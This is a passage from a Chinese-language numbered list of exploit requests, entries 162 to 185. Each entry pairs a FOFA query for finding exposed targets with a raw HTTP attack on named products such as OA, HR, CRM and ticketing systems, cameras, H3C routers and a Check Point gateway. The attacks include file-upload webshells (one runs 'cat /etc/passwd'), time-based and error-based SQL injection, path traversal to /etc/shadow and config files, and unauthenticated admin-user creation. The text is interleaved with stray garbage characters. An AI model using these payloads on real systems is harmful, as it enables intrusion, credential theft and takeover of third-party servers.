" A& M- S/ I5 l7 e- F<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow> f6 M8 T& t! `7 E' o* F/ ~, L
<tag>3</tag>3 c* D' w1 _6 I
</UploadResume>0 c( t+ z8 ], P7 |2 j
</soap:Body>( b, z6 d* |0 L2 \" U
</soap:Envelope>
' m8 c& J+ v7 q; |
1 T0 b; b/ N" b/ _9 }
7 `* y! G8 c( p) bhttp://x.x.x.x/dizxdell.aspx3 g# j& x r3 a5 S# H0 `: B
" k& O) Z2 x1 L# z9 W5 q2 W( @: C162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传- |7 _- O" ?! _! Q8 Z) Y
FOFA: app="和丰山海-数字标牌"6 o2 E7 N- M0 ~' b. z$ V: ?
POST /QH.aspx HTTP/1.1' o2 a+ z, Q. y: K
Host: x.x.x.x% Y: ?3 l$ L& l/ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0/ t( p! ~ s8 ?$ z) v$ X- U
Connection: close6 \, J" ^$ y4 U C. P% p
Content-Length: 583, x+ e; \" x* M# Z, j$ p% c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey# M5 D9 }6 K) g0 D9 Q
Accept-Encoding: gzip. e+ `- m! U% V* q
! f0 Q. q/ `7 l$ s8 j7 x------WebKitFormBoundaryeegvclmyurlotuey; s5 s; b9 n: v, a7 G
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"3 T5 C$ t8 s$ ^* Q: k/ d$ c# i
Content-Type: application/octet-stream# u z @5 U7 O/ V3 M7 I4 i
4 |; P; C6 N3 \6 Z
<% response.write("ujidwqfuuqjalgkvrpqy") %>3 a" W- r5 j0 G) r% }' b
------WebKitFormBoundaryeegvclmyurlotuey
/ D; p! A4 E% ^3 _3 V8 s* QContent-Disposition: form-data; name="action"
& k. B* w: r* t' P+ L3 ?6 b, ~- ]! [4 y3 {1 u: O9 s* w
upload* B6 a6 m5 z4 E. S+ A ~- R
------WebKitFormBoundaryeegvclmyurlotuey
4 Y3 ?7 Y N6 Z7 m9 GContent-Disposition: form-data; name="responderId"
* v- a, _7 ?; p" F' |5 ?* p% Z7 O
; c0 r) d6 t" k0 dResourceNewResponder2 J( m- j' m, e
------WebKitFormBoundaryeegvclmyurlotuey+ t2 t1 E# n3 o3 T5 e( u
Content-Disposition: form-data; name="remotePath"2 L% e1 _1 B, R. r. Z+ C3 a
$ m6 Y5 b# _) r0 s8 G5 I
/opt/resources
+ g, X, T6 k0 z------WebKitFormBoundaryeegvclmyurlotuey--, M( \( f8 g7 I8 `' b
# S( a- \! r# ?- W
" Y7 K- [- _/ b5 P9 H3 \
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
' V, D) A* a) _) m- Z
$ ]+ E# ^0 g4 A- N: j8 i# E2 z163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
+ a8 {8 a" _5 w, u9 FFOFA: icon_hash="-795291075"5 t; u# G! G5 N3 N
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.13 x; F0 \3 _8 P7 ?) W$ B
Host: x.x.x.x3 i+ |) r3 `& L+ Z M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
$ G P6 D3 a( dConnection: close$ W& U* g2 F2 j! e- K( A$ G
Content-Length: 293
+ @/ r7 B4 b# I/ ?4 DAccept: */*# c: I& S: p3 x+ O& ~5 b
Accept-Encoding: gzip, deflate! `* }$ `1 H2 t1 p3 `
Accept-Language: zh-CN,zh;q=0.9
. p. y. @. {6 Z; H" O7 o' lContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod9 g! L6 { `" H3 @
& r) {: u3 G, m' W" q
------iiqvnofupvhdyrcoqyuujyetjvqgocod7 ]7 {/ b2 L) n) j8 I
Content-Disposition: form-data; name="name"2 K: J8 A2 R h# i# w
8 m5 }5 _! u6 F0 m
1.php
3 G/ v( `8 S% x1 j------iiqvnofupvhdyrcoqyuujyetjvqgocod
0 O7 F( \% z6 ]: S! S4 F8 T# c) y, {Content-Disposition: form-data; name="upfile"; filename="1.php"
) _! T: p' o; r L5 J9 A. t. }& dContent-Type: image/jpeg
* j8 ^9 _7 e9 G x) J6 X9 C8 ], R0 Z' H7 i3 w7 w8 p
rvjhvbhwwuooyiioxega; {) ? t7 M3 x
------iiqvnofupvhdyrcoqyuujyetjvqgocod--- W' q! x& M! \( ~; Z
+ |# c [+ F) h# g1 D* d
% o `: J1 E$ ^6 U% P164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传+ E/ I0 y# C6 i5 c5 P: k
FOFA: title="智慧综合管理平台登入"
4 E# ~* L8 d2 K& ~9 |0 lPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1& a* n5 p" ^7 K5 \
Host: x.x.x.x1 h/ I( f( w9 E/ m& }4 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
) `% [; s' C/ B2 Y9 K) jContent-Length: 288
1 G, A6 Q6 x NAccept: application/json, text/javascript, */*; q=0.01
; V2 _ `( ~! f) k* p% d$ IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,: U+ s9 w$ [( T9 P: u3 P: a! D; L
Connection: close
7 b5 ~# S, c; U0 \0 QContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl3 t& {+ q( P* ^ \. M" i+ n0 X
X-Requested-With: XMLHttpRequest
/ a- V/ k7 `) P0 p' rAccept-Encoding: gzip" f. w8 k/ b# T; c6 y# r
) p" {7 z: p0 t: s2 ?" i6 {, ]9 J r------dqdaieopnozbkapjacdbdthlvtlyl
( ]& w# K' U6 a) [3 bContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
& L4 n0 o; U; z. WContent-Type: image/jpeg
! D; e! Q3 o4 w2 S+ ~; M. `
/ Q l8 o7 L: R/ v3 i<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>1 ]5 M' X+ P* T) { N
------dqdaieopnozbkapjacdbdthlvtlyl--" A4 Z) J J$ e+ T6 f: l
+ r' O: H! t# X& n' B5 c# G
9 p7 k$ z( E7 o7 F0 u- L* ?http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
) M4 q, o0 `) y3 X
3 U2 L* ~! J. }165. OrangeHRM 3.3.3 SQL 注入
, r4 D. ~5 I. VCVE-2024-36428
8 S. _ e Z k& X% A6 a8 ^FOFA: app="OrangeHRM-产品"! X7 T9 U1 k& o
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))1 N9 T3 x& u) e; X! ~$ D
7 f7 Z0 ?( G: T4 O( y `0 @# u, d3 I1 A, N. g% K. N, F" h
166. 中成科信票务管理平台SeatMapHandler SQL注入# R/ s- U1 o) ?" v' a1 S
FOFA:body="技术支持:北京中成科信科技发展有限公司"* `6 F, N' C5 ?2 c/ n+ f; K
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
3 ]% w6 n3 ^- F" f1 ]1 g6 E( q- aHost:
" |$ `$ v! j. QPragma: no-cache$ U9 ^9 F) ~" b7 ?: ]6 F
Cache-Control: no-cache
) @; H' f9 d3 YUpgrade-Insecure-Requests: 1+ j3 A4 T) c1 H( N+ n! J8 |& O# p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.365 i% S1 v, p5 K: ]# D# u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% N) x3 m* }5 D: `! m+ G
Accept-Encoding: gzip, deflate
: a# u1 `8 G, @Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
* d$ o, L z x( ?Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
) W! W6 ?0 u. k8 e1 xConnection: close; R* @7 H) d8 L. a; C
Content-Type: application/x-www-form-urlencoded
8 S6 \, D. |# F5 \6 KContent-Length: 89
7 I* h. B3 @: j" N. H; T5 V; A+ ~4 w; i; k- z0 u
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
. G2 a4 g1 p* \) {) {' E5 ]; N1 K7 P! U* p4 [" T& N4 R* N
& A5 j t! \7 K1 j167. 精益价值管理系统 DownLoad.aspx任意文件读取
, Q1 e& D, F. s+ I5 EFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
( g9 `, {5 d, e6 [' z4 |GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1) u$ l4 N' K+ h W* a# G$ n
Host:
# d- e: e6 P* ], ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ p& r& g/ b$ n$ RContent-Type: application/x-www-form-urlencoded
' R& W% T$ ~1 NAccept-Encoding: gzip, deflate q2 C' {) O" q/ y
Accept: */*
% V" R% ]' |% q/ t+ aConnection: keep-alive
- n" f8 x l5 J+ `3 d- Z5 j- W
. a/ U2 u5 o9 f) U6 |% m
$ V: x, U$ i( b+ X+ [% L, O; }168. 宏景EHR OutputCode 任意文件读取
7 u/ K2 l; z/ K" P9 f/ {" }( i& JFOFA:app="HJSOFT-HCM"' B# c5 K4 l$ R& E: w
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
, n9 H0 P- c5 m' ^+ A3 o* fHost: your-ip6 j8 j- k* r: s- S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
1 B/ e. R' o4 M x5 OContent-Type: application/x-www-form-urlencoded. ?0 o; T( |( g2 m
Connection: close5 \# S. c# [6 u! L
' k" c8 {6 u! G/ B2 b Q) s
0 A7 L& S* {3 R; z) s
. y q7 P: ^, M' w Z( D( a8 `
169. 宏景EHR downlawbase SQL注入
d% a! Y8 h) H2 K z. nFOFA:app="HJSOFT-HCM"
1 o i- [4 {: q# T) T2 d2 iGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
" d8 b- z0 g2 \! K. c2 d% u( E$ THost: your-ip
; F, Q' r4 q7 u3 Z" TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 i1 @- Z% g5 }; _) f
Accept: */*
! k3 F9 r: Q* T, e2 b, K, t3 VAccept-Encoding: gzip, deflate
7 q4 b* R3 C+ h% l. SConnection: close
+ t9 W# e% E6 D6 u4 c' ^) Z+ e3 z3 U7 z
6 W" z1 U5 L( k; a" w/ y
4 B" }3 q' h; @. F170. 宏景EHR DisplayExcelCustomReport 任意文件读取8 @, A- x; x, U$ k
FOFA:body="/general/sys/hjaxmanage.js"
[ n7 c1 k9 s- UPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.10 Y) R" H' G7 n9 Y ]- s) t1 Z
Host: balalanengliang y$ W2 Z! K( {( |9 s; S
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 G9 f3 {5 D; |* g! L# eContent-Type: application/x-www-form-urlencoded3 |% O) X0 I( Y# [" k. b
- j7 G0 S; F/ B% ?filename=../webapps/ROOT/WEB-INF/web.xml0 k" k/ v& ]. ^7 W$ i7 m
+ X: k- m, a8 R% b2 q: \9 ~( ~# S+ G' Y7 o
171. 通天星CMSV6车载定位监控平台 SQL注入
" _* U9 @$ Z0 n T: ?$ L2 F* f! Q+ _- Z6 PFOFA:body="/808gps/"
$ H: e/ J) b1 RGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
$ o3 }) [9 T) Z8 s( I, \Host: your-ip
( h/ m- \( b6 q; B( K6 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& A6 O# F2 i' `8 Z# }. T# y+ z
Accept: */*
$ k- u# ~4 L- \' O/ b+ z$ A" C2 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' v' B O; {0 b& b6 ?9 w+ PAccept-Encoding: gzip, deflate' s$ u8 V3 J5 L& e; y: i- ?
Connection: close+ O) G5 |( r1 v1 m; j4 T- ?; N" R- k! d
# a1 o7 w! o+ G; [- i
# x9 j, n: p& ?8 k* e/ y' y, I
- v$ o# l' }- f- L! V1 I$ p) T172. DT-高清车牌识别摄像机任意文件读取& S' r0 o. U7 w0 u K
FOFA:app="DT-高清车牌识别摄像机"1 S2 j' F/ }6 n N" @/ @! T
GET /../../../../etc/passwd HTTP/1.1
; p& A$ I! p+ N0 m6 @Host: your-ip
+ _9 r3 V7 o# c* S7 T4 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ?$ k+ w/ e8 ~; l, Z. z1 G
Accept-Encoding: gzip, deflate
' j9 L5 A. Z' s0 eAccept: */*3 \& ^, T7 ]3 n6 p1 B/ d
Connection: keep-alive q5 R, x- M. W7 z
0 L. u' q2 o- E6 ^2 Z
! D& s/ v: V9 F7 y- E m6 ?
5 @; j; z7 o# U: y: d: h173. Check Point 安全网关任意文件读取: l9 i: G/ [( [, v& E6 \; A1 H) x- Q
CVE-2024-24919
2 m& s. x. _) a0 n2 JFOFA:app="Check_Point-SSL-Network-Extender"
% o7 p5 l1 V6 e$ v, z# T- [8 aPOST /clients/MyCRL HTTP/1.1
1 T V9 o( [8 s qHost: your-ip0 q' z5 B2 [ C7 ^
Content-Type: application/x-www-form-urlencoded% d8 e6 r7 R/ j0 |& L9 R- T
7 r& a; f/ h# {* G4 j# I
aCSHELL/../../../../../../../etc/shadow1 V* E$ \* j7 Q. T; p7 d
- e& s0 A4 K) |) @: m4 M! A0 u
# _; {' C1 K3 N) h; s- P+ `1 W# r# d" h2 X6 m' w
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
! d* f/ }3 t ^* O: F4 {FOFA:app="金和网络-金和OA"
8 u( H( f2 E- ]GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
) X% v( ? g3 D2 ?Host: your-ip& ~2 |7 g( | T+ E6 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" a* u, I8 q3 F$ a' X' C3 C/ _0 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 L- v- E7 x) _$ X4 o- Z7 a
Accept-Encoding: gzip, deflate, br
- I& Y# R6 ~7 NAccept-Language: zh-CN,zh;q=0.9
5 S4 ?/ j3 \4 B/ h) }Connection: close
5 Q& w7 g+ j3 S3 t! ~0 X$ v3 A, `" P( E8 ^# S
( W: ^/ G! P0 d" k
8 d3 ?4 S+ ]( }7 \
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# Z7 o; n8 P2 K N( V0 D4 \! o4 NFOFA:app="金和网络-金和OA"2 r& C1 ^6 Y2 c- h2 j$ `3 y
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
6 r; J9 `$ b! `, i& N$ R: tHost:
7 {+ M/ O2 s( E& [User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' v7 |7 u7 g1 u7 `5 X$ oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" y& ]; f% ]" o, G6 Z! ~8 S/ A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- C, f1 {9 |6 y W8 r% n2 ~
Accept-Encoding: gzip, deflate
# [, W0 r& c9 f0 q$ O9 n; P- f6 D# SConnection: close
I9 y: ]: t. T. H- E0 m G( P1 JUpgrade-Insecure-Requests: 1& Z/ S j/ I+ B7 y+ y
3 k/ z1 c: o4 b( K" w& [2 t: Y& y) k7 j" J; _4 f( z; H
176. 电信网关配置管理系统 rewrite.php 文件上传% m# J# F8 k7 T8 Q- M
FOFA:body="img/login_bg3.png" && body="系统登录"3 z+ K# B. {" p: h
POST /manager/teletext/material/rewrite.php HTTP/1.13 Q# K* {3 q0 r! U( Q7 f
Host: your-ip! B# L1 \, ~( h C# o4 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) l; m6 q, \. d3 g2 K0 q2 j7 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT% y$ V9 Q$ v. O6 L" @
Connection: close
/ _8 J: _6 |2 B7 R
7 b( V0 P0 W+ y; `6 Y------WebKitFormBoundaryOKldnDPT. @: M- R4 w% C
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
& D# y& o. g1 n. z9 k5 XContent-Type: image/png
1 e* |1 _6 K% Z0 [- m! K8 z5 F2 p # H6 s4 j+ r& p5 s
<?php system("cat /etc/passwd");unlink(__FILE__);?>: S' x' Y9 l; I& d. J
------WebKitFormBoundaryOKldnDPT8 |0 G. r: `+ _
Content-Disposition: form-data; name="uploadtime", O. E) s1 n/ @6 Y- m1 X. \
7 {$ R7 `. m* i2 @* e4 p
8 B }6 t9 T2 u+ ^- [------WebKitFormBoundaryOKldnDPT--
% r2 w7 F) H3 y4 {
! Q# c- R& S! z9 n# O5 z) b9 r+ A
5 M" L: m9 _3 d. ~6 G, z6 m0 Y+ P* E
177. H3C路由器敏感信息泄露8 |/ A# c" G: M
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
" v! b, ~! R* b" j/userLogin.asp/../actionpolicy_status/../M60.cfg6 H7 K/ o# d5 w" @. w' Z
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
# a. t5 `$ @ D2 N* K3 C1 I/userLogin.asp/../actionpolicy_status/../GR5200.cfg. w1 T! p! T& z$ T T) \
/userLogin.asp/../actionpolicy_status/../GR3200.cfg% W3 q8 T+ q/ c8 \3 F
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
- t# e, V+ J1 h# R( z" F/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* C; ?; Y" g+ G) C+ Z4 R) C1 U# K
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg! n0 t% o- v3 O# P+ E
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
9 ~. X( b8 B/ A$ ^$ @/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg5 G6 }/ I b+ _% K! t2 ^* @) y
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
( Y5 {$ b' k5 Z4 g9 O/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/ Q0 B/ ] V" t+ \& d# T3 }, O/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
- b0 {: }. M/ j/userLogin.asp/../actionpolicy_status/../ER3260.cfg
! J2 Q, M3 b' j' o/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg, F4 U( Z4 h5 S F1 L! A' }, b
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
& U* t# A# S" h. p/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg9 s5 ^2 [% \( R+ b- |* s" x
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
; r/ U/ s { f- F5 j! p3 D/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
U, c- |5 r4 I+ C a1 q0 X# D. R/userLogin.asp/../actionpolicy_status/../ER3100.cfg' w% w( X9 B1 s5 P8 n. |, j
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
/ v9 i; Y& A+ L" [/ c" N* S4 s
* B) z% m4 _0 \" G, m9 U6 `' Y: E. C9 i1 W2 {# {* D! V& F
178. H3C校园网自助服务系统-flexfileupload-任意文件上传& q) |& Q: {' [, T
FOFA:header="/selfservice"
. x! c1 e6 {* }5 b9 R9 `# kPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1- P3 S% C7 b( y! W0 Y
Host:
% w) q6 ^, K+ X6 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 ?& g x+ m( XContent-Length: 2521 e& J! I/ m: b0 k3 H6 O3 q; t; z
Accept-Encoding: gzip, deflate
# u- c$ w. Y: B! K* k& j$ SConnection: close, n8 i& S9 B G3 T
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l/ p- Q' W; G1 W0 q4 a& p' O0 E
-----------------aqutkea7vvanpqy3rh2l5 g7 J- V- `; g8 D
Content-Disposition: form-data; name="12234.txt"; filename="12234"0 c# ~+ t2 }, Y+ @; _" t. x* o) ~) W
Content-Type: application/octet-stream
4 K: U' Q/ c! l& C( dContent-Length: 255
0 }1 h- V: N; @( G; w
( ~8 j; V k. X12234
' r3 _* i! x# A-----------------aqutkea7vvanpqy3rh2l--
0 ]0 E! F- ^1 o2 y" H, O! c+ I* K8 Y) R
2 O5 C5 k& |$ R1 T
GET /imc/primepush/%2e%2e/flex/12234.txt
$ j- z' j0 y! t$ r# Y% m. W
) Y5 r; w. ~3 J. w
+ `& [- P; Q0 ?179. 建文工程管理系统存在任意文件读取3 D! F( ]6 s7 V7 d+ M5 E
POST /Common/DownLoad2.aspx HTTP/1.14 A/ V. w- H" J8 [3 X& J. C
Host: {{Hostname}}1 V1 l/ }& t1 X3 G
Content-Type: application/x-www-form-urlencoded e' F0 F/ c; w+ J5 f* E, @7 {6 z
User-Agent: Mozilla/5.03 ^* V- E( b& m. k2 m4 L6 y
- O* J X$ i5 ^( P# z& y6 upath=../log4net.config&Name=
9 Y3 s2 P9 P2 T! z3 d) _7 X+ L; X$ u4 [
- m! C/ ]4 Q% B. j1 M* D7 I( O2 a) J& Z3 d" T
180. 帮管客 CRM jiliyu SQL注入$ |+ {2 w' S* n2 f* a
FOFA:app="帮管客-CRM"9 F; ^# x, A, A. _) k% ^$ E& o
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.12 A2 d5 k' S% U- ?7 B6 }
Host: your-ip+ p: _) R/ z: h3 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' n+ {' `! h3 M8 ~2 S0 e& J/ {6 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. }+ m9 N F6 CAccept-Encoding: gzip, deflate! w1 K, W& c' r1 W _* c
Accept-Language: zh-CN,zh;q=0.9
4 Q4 p& S% d% {$ x. ?/ A2 ]Connection: close# J* I8 e, G' t4 i: l: `% C b
, \; W; i- c0 q7 ~9 ^& `& l7 a. O- E( s6 W) S! m4 ]! ~6 N
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入$ g3 v" d; K/ r) z) P4 i
FOFA:"PDCA/js/_publicCom.js"- n4 \0 D) l+ h6 e: ^
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1' h- L, ]! N7 ~/ _; Q6 T9 T
Host: your-ip! ^' @6 L; k! z8 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
U. x1 K2 M" y4 ?% V% a, k$ AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! m! l4 D% H% q7 M3 j
Accept-Encoding: gzip, deflate, br0 r9 j! V, s+ b- ^! y+ p% }* }
Accept-Language: zh-CN,zh;q=0.92 j6 \$ z; S. a
Connection: close/ X/ C$ y0 W: ^ D1 O) A3 Z2 Q: t
Content-Type: application/x-www-form-urlencoded! _% }( _; G/ w' ?5 g
7 Z# g& u2 e9 Z& D
3 S1 `9 I e$ P" h4 L/ Oaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20! q5 s7 F" l( L; B6 y
' A9 d7 W8 R0 m3 R- C0 X* I5 F% _2 `' t
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建& p2 z, e# z$ G6 G- C" \
FOFA:"PDCA/js/_publicCom.js"% r; h8 w) b5 B4 m
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.15 o, ]- N6 ?. D) }2 C5 o
Host: your-ip
& `2 R) r! ^$ b! a IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.361 h3 w( U2 q3 T. O3 G/ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ e( h4 |. p1 t# o9 Q UAccept-Encoding: gzip, deflate, br; m, d. I1 t3 |# ?6 P G& H
Accept-Language: zh-CN,zh;q=0.91 P: H. ~* x& l3 ?4 v" U5 D/ u+ P% }
Connection: close$ _. [2 P3 Z0 n+ [; A" r
Content-Type: application/x-www-form-urlencoded' F; |% L: j) B/ O) O& ] d
& x) t" Y& x' v9 F1 {5 x* c) j) B. |3 e$ h: ^5 D( ~/ K3 G" Z/ y2 ]
username=test1234&pwd=test1234&savedays=1
( q% E$ w# t$ u" x+ s* J) W+ U; G! r4 n+ ^
7 u. J2 X, o0 b' @) \/ k7 Z
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 O, L- |3 D1 @FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
) u& L3 w/ ?" {" Q) y2 ^0 c4 HGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
0 I- \, e" {1 L, t# j' AHost: your-ip
0 S' V l) @$ x u6 s* @' J% n: mUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
; i* @5 e K8 l- j$ l0 gAccept-Charset: utf-8
+ O f8 @" Q2 A& lAccept-Encoding: gzip, deflate- I& I N; W$ |7 K2 \- y0 \7 s) t
Connection: close
/ [9 G' a" { j W. a( u, c
# U: e% f. C% ]- k& T. ]0 ^6 f+ w8 o0 b/ x
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
& M0 a. [9 |9 X3 @FOFA:server="SunFull-Webs"
' {2 ^5 l! c! n3 RPOST /soap/AddUser HTTP/1.1
$ [( [1 P) J# J* JHost: your-ip9 s2 P+ n( G" W) L/ z' `( B- r
Accept-Encoding: gzip, deflate1 w8 D% x' m. K+ r/ f% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; ]: w( r5 [2 v" }$ L8 g" xAccept: application/xml, text/xml, */*; q=0.01
- h6 y. P3 `1 n2 F A& A" P# m7 HContent-Type: text/xml; charset=utf-8
% C1 q' @, p! f8 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" O9 J m! ]4 |7 v4 T
X-Requested-With: XMLHttpRequest
) }' s& L( ^$ Z+ e5 `0 B) H; d& e% `( v: }/ Z: W$ d% F; s
, i3 O; B# ~' Y2 ?2 e+ F
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')9 A" X" d" M. x
8 z5 C+ n8 C( N' N
w8 ~" |# J& _" X. }# M185. 瑞友天翼应用虚拟化系统SQL注入
) y+ z5 Z* q/ n: o" M; D1 {0 lversion < 7.0.5.1: A1 t, v3 s+ N, f! R! T: [1 }
FOFA:app="REALOR-天翼应用虚拟化系统"" t8 {# o8 I: o6 `. g
